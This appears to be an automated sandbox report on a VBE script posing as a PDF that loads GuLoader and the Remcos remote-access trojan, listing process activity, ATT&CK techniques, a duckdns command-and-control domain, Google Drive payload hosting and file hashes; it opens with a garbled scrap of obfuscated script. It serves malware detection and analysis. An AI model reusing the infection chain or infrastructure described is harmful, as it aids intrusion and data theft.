yrg.osfalst bonede,lm afs.auke$unchspoliatorfm tudasandnpam d flau felrlaura');xylotomies207 ($unpositively);xylotomies207 (allemandes ' t,e$boucw periJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-8OIXMOJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		11
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping121
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559542 Sample: LSMU CITATA LT 20-11-2024#U... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 25 drive.usercontent.google.com 2->25 27 drive.google.com 2->27 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Yara detected GuLoader 2->37 39 6 other signatures 2->39 8 powershell.exe 15 2->8         started        11 wscript.exe 1 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 41 Early bird code injection technique detected 8->41 43 Writes to foreign memory regions 8->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 8->45 55 2 other signatures 8->55 15 msiexec.exe 6 8->15         started        18 conhost.exe 8->18         started        47 Suspicious powershell command line found 11->47 49 Wscript starts Powershell (via cmd or directly) 11->49 51 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->51 53 Suspicious execution chain found 11->53 20 powershell.exe 14 20 11->20         started        process6 dnsIp7 57 Detected Remcos RAT 15->57 59 Hides threads from debuggers 15->59 29 drive.usercontent.google.com 142.250.181.1, 443, 49729, 49805 GOOGLEUS United States 20->29 31 drive.google.com 172.217.19.174, 443, 49718, 49723 GOOGLEUS United States 20->31 61 Found suspicious powershell code related to unpacking or dynamic code loading 20->61 23 conhost.exe 20->23         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              gnsuw4-nsh6-mnsg.duckdns.org0%Avira URL Cloudsafe
              https://drive.usercontent.google.comseUr0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		172.217.19.174
              		truefalse
                		high
                drive.usercontent.google.com
                		142.250.181.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  gnsuw4-nsh6-mnsg.duckdns.orgtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2385346725.00000298A1A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000002.00000002.2385346725.00000298A10AC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://drive.googPpowershell.exe, 00000002.00000002.2385346725.00000298A19DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.googhpowershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.usercontent.google.com/msiexec.exe, 00000008.00000003.2654943529.0000000008398000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://drive.google.compowershell.exe, 00000002.00000002.2385346725.00000298A1DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.compowershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2526221910.0000000004D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.com/msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.compowershell.exe, 00000002.00000002.2385346725.00000298A10AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1E4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/kmsiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2385346725.000002989FC51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://apis.google.compowershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.usercontent.google.comseUrpowershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2385346725.000002989FC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2526221910.0000000004D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                142.250.181.1
                                                                		drive.usercontent.google.comUnited States
                                                                		15169GOOGLEUSfalse
                                                                172.217.19.174
                                                                		drive.google.comUnited States
                                                                		15169GOOGLEUSfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1559542
                                                                Start date and time:2024-11-20 16:52:09 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 59s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:12
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:LSMU CITATA LT 20-11-2024pdf.vbe
                                                                Detection:MAL
                                                                Classification:mal100.troj.expl.evad.winVBE@9/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 60%
                                                                • Number of executed functions: 36
                                                                • Number of non-executed functions: 19
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target msiexec.exe, PID 8020 because there are no executed function
                                                                • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7808 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: LSMU CITATA LT 20-11-2024#U00b7pdf.vbe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                10:53:13API Interceptor162x Sleep call for process: powershell.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                No context

                                                                Domains

                                                                No context

                                                                ASNs

                                                                No context

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0ePO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                prepper-wu.ps1Get hashmaliciousUnknownBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                SnapshotPc.ps1Get hashmaliciousUnknownBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                cYDCUkIGVB.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                cYDCUkIGVB.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                KRcLFIz5PCQunB7.exeGet hashmaliciousQuasarBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                https://cipdegiphar-pharm.click/BD0C84/D0C-N0V20.htmlGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                37f463bf4616ecd445d4a1937da06e19PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                Towered.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174
                                                                globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                • 142.250.181.1
                                                                • 172.217.19.174

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):11608
                                                                Entropy (8bit):4.8908305915084105
                                                                Encrypted:false
                                                                SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                Malicious:false
                                                                Preview:@...e................................................@..........

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkwvzkzk.pd0.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb445qxx.zbf.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uiagicxl.y1k.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yafzq4zp.f55.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Roaming\Malodourously.dar

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):459852
                                                                Entropy (8bit):5.9704762780148055
                                                                Encrypted:false
                                                                SSDEEP:12288:Cgq1XbXhhm+zyx6hdgcoqY1WM0ca2mWTAzW/jiW:CgeXbXho1xAgcoVoMba2mGAzzW
                                                                MD5:3BAF228E40AAB172AEFB503997B3EB4F
